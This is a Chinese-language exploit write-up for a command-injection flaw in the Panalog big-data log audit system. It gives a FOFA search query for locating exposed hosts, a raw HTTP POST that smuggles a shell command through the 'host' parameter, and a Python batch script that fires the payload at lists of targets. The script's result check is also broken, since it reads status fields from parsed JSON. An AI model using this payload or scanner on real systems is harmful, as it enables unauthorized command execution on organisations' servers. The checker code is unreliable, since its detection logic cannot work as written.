声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
1、产品简介
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。
2、FOFA语法
app="Panabit-Panalog"
3、漏洞复现
POST /content-apply/libres_syn_delete.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host:
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
token=1&id=2&host=|id >111111.txt
文件路径: https://xxxxxxx/content-apply/11111.txt
4、批量检测脚本
import argparse
import time
import requests
parser = argparse.ArgumentParser(description='Panalog大数据日志审计系统libres_syn_delete.php命令执行漏洞')
parser.add_argument('-f',help='Batch detection file name',type=str)
args = parser.parse_args()
file = args.f
def get_url(file):
with open('{}'.format(file),'r',encoding='utf-8') as f:
for i in f:
i = i.replace('\n', '')
send_req("http://"+i)
def write_result(content):
f = open("result.txt", "a", encoding="UTF-8")
f.write('{}\n'.format(content))
f.close()
def send_req(url_check):
print('{} runing Check'.format(url_check))
url = url_check + '/content-apply/libres_syn_delete.php'
header = {
'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Connection':'close',
'Content-Length': '33',
'Content-Type': 'application/x-www-form-urlencoded'
}
data = (
"token=1&id=2&host=|id >111111.txt"
)
try:
requests.packages.urllib3.disable_warnings()
response = requests.post(url=url,headers=header,data=data,timeout=3).json()
if response.status_code == 200 and response.Content == 1:
print(f"{url}存在Panalog大数据日志审计系统libres_syn_delete.php命令执行漏洞!!!")
time.sleep(1)
except Exception as e:
print(e)
pass
if __name__ == '__main__':
if file is None:
print('请在当前目录下新建需要检测的url.txt')
else:
get_url(file)